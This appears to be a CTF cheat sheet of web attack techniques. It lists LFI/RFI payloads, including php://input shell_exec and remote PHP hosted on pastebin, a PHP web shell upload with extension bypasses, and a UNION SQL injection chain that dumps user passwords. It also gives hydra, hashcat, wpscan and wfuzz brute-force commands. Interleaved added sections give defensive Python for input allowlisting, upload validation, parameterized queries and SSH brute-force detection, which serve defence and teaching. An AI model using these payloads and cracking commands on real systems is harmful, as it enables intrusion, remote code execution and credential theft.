CTF

  • Web Security
  • Reverse Engineering
  • Binary Exploitation
  • Cryptography
  • Forensics
  • Steganography

Web Security

LFI & RFI

e.g. a web page with the link

http://192.168.43.207/ipb/ipbScript/PHP-LFI/index.php?page=page3.php

...?page=page1.php

can be replaced with

...?page=/etc/passwd
...?page=/etc/passwd%00 (old PHP versions)
...?page=../../../../../../../../../etc/passwd
...?page=php://filter/convert.base64-encode/resource=index.php
...?page=php://filter/convert.base64-encode/resource=index
...?page=http://localhost/(file .txt)?

From the terminal:

curl -X "POST" -d "<?php echo shell_exec('cat /etc/passwd')?>" "http://192.168.43.207/ipb/ipbScript/PHP-LFI/index.php?page=php://input"

Using pastebin.com:

  1. New Paste
  2. enter the code
    <?php
        echo "Tes RCE";
        echo shell_exec("ls -la");
    ?>
    
  3. Paste expiration: just 1 hour
  4. Create New Paste
  5. Raw
  6. copy the raw link
...?page=http://pastebin.com/raw/(link)
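Added example (not from the original notes): the defender-side counterpart to the LFI/RFI tricks above, in Python. It assumes a hypothetical allowlist of page names under a hypothetical PAGES_DIR. resolve_page() includes only exact allowlisted names and re-checks that the resolved path stays inside that directory, and looks_like_lfi_probe() flags the traversal, null-byte, wrapper and remote-URL patterns listed above so a request can be logged or refused before anything is included:

```python
import os
import re

# Constructed values: where the page templates live and which names exist.
# Both are assumptions for this example, not paths from the original notes.
PAGES_DIR = os.path.realpath("/srv/app/pages")
ALLOWED_PAGES = {"page1.php", "page2.php", "page3.php"}

# Indicators matching the abuse patterns in the notes above:
# "../" traversal, %00 / NUL truncation (old PHP), any stream wrapper or
# remote URL scheme (php://, http://, ...), and absolute filesystem paths.
PROBE = re.compile(
    r"\.\.[/\\]"                  # directory traversal
    r"|%00|\x00"                  # null-byte truncation
    r"|^[a-z][a-z0-9+.\-]*://"    # wrapper or remote URL scheme
    r"|^/",                       # absolute path such as /etc/passwd
    re.IGNORECASE,
)


def looks_like_lfi_probe(value: str) -> bool:
    """True when a ?page= value matches a known LFI/RFI pattern (log or block it)."""
    return PROBE.search(value) is not None


def resolve_page(value: str):
    """Return the file to include for ?page=value, or None to refuse the request."""
    # Exact allowlist match: no normalisation, no extension guessing.
    if value not in ALLOWED_PAGES:
        return None
    # Defence in depth: the resolved path must still be inside PAGES_DIR,
    # so a future mistake in the allowlist cannot turn into traversal.
    candidate = os.path.realpath(os.path.join(PAGES_DIR, value))
    if os.path.commonpath([PAGES_DIR, candidate]) != PAGES_DIR:
        return None
    return candidate


if __name__ == "__main__":
    # Values taken from the notes above, run through both functions.
    samples = [
        "page3.php",
        "../../../../../../../../../etc/passwd",
        "/etc/passwd%00",
        "php://filter/convert.base64-encode/resource=index.php",
        "php://input",
        "http://pastebin.com/raw/EXAMPLE",
    ]
    for v in samples:
        print(f"{v!r:60} probe={looks_like_lfi_probe(v)!s:5} include={resolve_page(v)}")
```

The allowlist is the control; the regex is only for visibility. A blocklist on its own is easy to get wrong (encoding variants, new wrappers), which is why resolve_page() never consults PROBE at all.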

File Upload

create a file tes.php

<?php
    echo shell_exec("ls -la /");
?>

using Burp Suite

edit the file type
rename the file to one of:
    .php, .php3, .php4, .php5, .php7, .pht, .phtml 
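Added example (not from the original notes): server-side validation that defeats the upload tricks above, in Python. It assumes a hypothetical image-upload form. Because the file type sent by the browser is client-controlled (that is exactly what gets edited in Burp Suite), the check ignores it and instead compares the first bytes of the file against the signature of the claimed image type, rejects every script extension from the list above anywhere in the name (so shell.php.jpg is refused too), and stores the file under a random name:

```python
import os
import secrets

# Constructed policy for this example: the form only accepts images.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Extensions the notes above list as executed by common PHP handlers.
# Rejecting them anywhere in the name also covers double extensions.
SERVER_SIDE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "pht", "phtml"}

# Leading bytes (file signatures) expected for each accepted type.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def upload_decision(filename: str, head: bytes):
    """Return (accepted, detail); on acceptance detail is the random stored name."""
    # Drop any directory part the client supplied and normalise case.
    name = os.path.basename(filename.replace("\\", "/")).lower()
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing extension or name starts with a dot"
    exts = parts[1:]
    if any(e in SERVER_SIDE_EXTENSIONS for e in exts):
        return False, "server-side script extension in filename"
    final = exts[-1]
    if final not in ALLOWED_EXTENSIONS:
        return False, f".{final} is not an allowed type"
    if not any(head.startswith(sig) for sig in MAGIC[final]):
        return False, "content does not match the claimed image type"
    # Never keep the user-supplied name: a random name removes any influence
    # over how the web server decides to handle the stored file.
    stored = f"{secrets.token_hex(16)}.{final}"
    return True, stored


if __name__ == "__main__":
    # Constructed uploads: the tes.php from the notes, a renamed variant,
    # a double extension, a mislabelled script, and a genuine JPEG header.
    cases = [
        ("tes.php", b"<?php echo shell_exec('ls -la /'); ?>"),
        ("tes.phtml", b"<?php echo 1; ?>"),
        ("shell.php.jpg", b"\xff\xd8\xff\xe0"),
        ("photo.jpg", b"<?php echo 1; ?>"),
        ("PHOTO.JPG", b"\xff\xd8\xff\xe0\x00\x10JFIF"),
    ]
    for fname, head in cases:
        print(f"{fname:15} -> {upload_decision(fname, head)}")
```

The stored file should additionally live outside the web root, or in a directory where the server has script execution disabled, so that even a mistake in this check does not yield code execution.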

SQL Injection

y'-- 
y' OR 1=1 '-- 

e.g. the URL

192.168.43.207/ipb/ipbScript/blog/post.php?id=1

replaced with

...id=999999999 UNION SELECT 1,2,3,..., (until the column count matches)

find the database name:

...id=999999999 UNION SELECT 1,database(),3,user()

find the table names:

...id=999999999 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()

find the table's columns:

...id=999999999 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_schema = database() AND table_name = 'user'

then:

...id=999999999 UNION SELECT 1,username,3,password FROM user
...id=999999999 UNION SELECT 1,username,3,password FROM user LIMIT 0/1/2,1 (row/column number ...)
...id=999999999 UNION SELECT 1,group_concat(username),3,group_concat(password) FROM user
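Added example (not from the original notes): why the UNION queries above work, and what stops them, shown in Python with an in-memory SQLite database (a constructed schema, not the one behind post.php). get_post_vulnerable() pastes the id into the query text, so the final payload from the notes returns rows from the user table; get_post_safe() first insists the id is an integer and then binds it as a parameter, so the same string never reaches the SQL parser as SQL:

```python
import sqlite3

# The last UNION payload from the notes above, reused unchanged.
PAYLOAD = "999999999 UNION SELECT 1,username,3,password FROM user"


def make_db():
    """Constructed blog schema with the same column count the payload expects."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE post (id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT);
        CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, email TEXT, password TEXT);
        INSERT INTO post VALUES (1, 'Hello', 'First post', 'alice');
        INSERT INTO user VALUES (1, 'alice', 'alice@example.test', 'constructed-hash-1');
        INSERT INTO user VALUES (2, 'bob',   'bob@example.test',   'constructed-hash-2');
    """)
    return conn


def get_post_vulnerable(conn, raw_id: str):
    # Vulnerable: string concatenation lets the client rewrite the query.
    sql = "SELECT id, title, body, author FROM post WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def get_post_safe(conn, raw_id: str):
    # Hardened: validate the type, then pass the value as a bound parameter.
    try:
        post_id = int(raw_id)
    except (TypeError, ValueError):
        return []
    sql = "SELECT id, title, body, author FROM post WHERE id = ?"
    return conn.execute(sql, (post_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", get_post_vulnerable(db, PAYLOAD))
    print("safe:      ", get_post_safe(db, PAYLOAD))
    print("safe, id=1:", get_post_safe(db, "1"))
```

SQLite has no database() or information_schema, so only the final dump query is reproduced here; the mechanism (client-controlled SQL structure versus a bound value) is the same on MySQL. Detection on the server side is straightforward too: a numeric id parameter that contains anything other than digits is already a signal worth logging.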

noxtal.com

Cracking

ZIP

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt file.zip

Hashes

Using hashcat:

hashcat -m $MODE hashes /usr/share/wordlists/rockyou.txt

Bruteforce SSH

Using hydra:

hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP -t 4 ssh
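Added example (not from the original notes): what the hydra run above looks like from the target's side, and a detector for it, in Python. The sample auth.log lines are constructed for this example. detect_ssh_bruteforce() keeps a sliding window of failed logins per source address, raises one alert when the count in the window reaches the threshold, and raises a second, higher-priority alert if an accepted login from the same address follows, which is the case that matters most in incident response:

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in syslog auth.log format (not real data): six quick
# failures then a success from one address, single failures elsewhere.
SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 web1 sshd[1201]: Failed password for invalid user admin from 192.0.2.10 port 51234 ssh2
Mar  3 10:15:03 web1 sshd[1202]: Failed password for invalid user test from 192.0.2.10 port 51235 ssh2
Mar  3 10:15:05 web1 sshd[1203]: Failed password for user from 192.0.2.10 port 51236 ssh2
Mar  3 10:15:07 web1 sshd[1204]: Failed password for user from 192.0.2.10 port 51237 ssh2
Mar  3 10:15:09 web1 sshd[1205]: Failed password for user from 192.0.2.10 port 51238 ssh2
Mar  3 10:15:11 web1 sshd[1206]: Failed password for user from 192.0.2.10 port 51239 ssh2
Mar  3 10:15:40 web1 sshd[1207]: Accepted password for user from 192.0.2.10 port 51240 ssh2
Mar  3 10:20:00 web1 sshd[1300]: Failed password for root from 198.51.100.7 port 40000 ssh2
Mar  3 10:25:00 web1 sshd[1301]: Accepted publickey for deploy from 203.0.113.5 port 40100 ssh2
"""

LINE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

THRESHOLD = 5                   # this many failures ...
WINDOW = timedelta(seconds=60)  # ... within this window raise an alert


def parse_auth_line(line: str):
    """Return (timestamp, result, user, ip) for an sshd auth line, else None."""
    m = LINE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; a fixed year is fine for relative windows.
    ts = datetime.strptime(f"{m['mon']} {m['day']} {m['time']}", "%b %d %H:%M:%S")
    return ts.replace(year=2024), m["result"], m["user"], m["ip"]


def detect_ssh_bruteforce(lines, threshold=THRESHOLD, window=WINDOW):
    """Sliding-window failure counter per source IP; returns a list of alerts."""
    failures = defaultdict(deque)   # ip -> timestamps of recent failures
    flagged = set()                 # ips already reported as brute-forcing
    alerts = []
    for line in lines:
        ev = parse_auth_line(line)
        if ev is None:
            continue
        ts, result, user, ip = ev
        if result == "Failed":
            q = failures[ip]
            q.append(ts)
            while q and ts - q[0] > window:     # expire old failures
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append({"kind": "bruteforce", "ip": ip,
                               "failures": len(q), "at": ts})
        elif ip in flagged:
            # A success after a burst of failures is the real incident.
            alerts.append({"kind": "success_after_bruteforce", "ip": ip,
                           "user": user, "at": ts})
    return alerts


if __name__ == "__main__":
    for alert in detect_ssh_bruteforce(SAMPLE_AUTH_LOG.splitlines()):
        print(alert)
```

The same windowed count per source address applies to the HTTP form brute-force further down; only the parser changes. Tune THRESHOLD and WINDOW against normal traffic before alerting on it, and note that hydra's -t 4 only controls parallelism, not how slowly a patient attacker can spread attempts across the window.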

Steganography

Crack a steghide passphrase using stegcracker. Install:

pip3 install stegcracker

Run:

python3 -m stegcracker tocrack.jpg

Web Directory and Query Parameters Bruteforce

Using gobuster:

gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -o gobuster.log -t 200 -u $URL

Using wfuzz:

wfuzz -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 200 --hc 404 http://www.host.name/FUZZ

Using wfuzz to bruteforce query parameters:

wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 200 --hc 404 http://www.host.name/?parameter=FUZZ

Recursive directory scan with wfuzz:

wfuzz -c -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -t 200 --hc 404 -R $DEPTH http://www.host.name/FUZZ

HTTP Form Bruteforce

Using Hydra:

hydra -l user -P /usr/share/wordlists/rockyou.txt $IP http-post-form "<Login Page>:<Request Body>:<Error Message>"

Wordpress

WPScan + password bruteforce:

wpscan --url $URL --passwords /usr/share/wordlists/rockyou.txt --usernames usernames.txt

Subdomain Bruteforce

Using wfuzz:

wfuzz -c -f wfuzz-sub.log -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u $URL -H "Host: FUZZ.host.name" -t 32 --hc 200 --hw 356

Note: you will need to adjust the --hc and --hw parameters to your needs. Check wfuzz -h for more information about those.

Using gobuster:

gobuster vhost -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $URL -t 32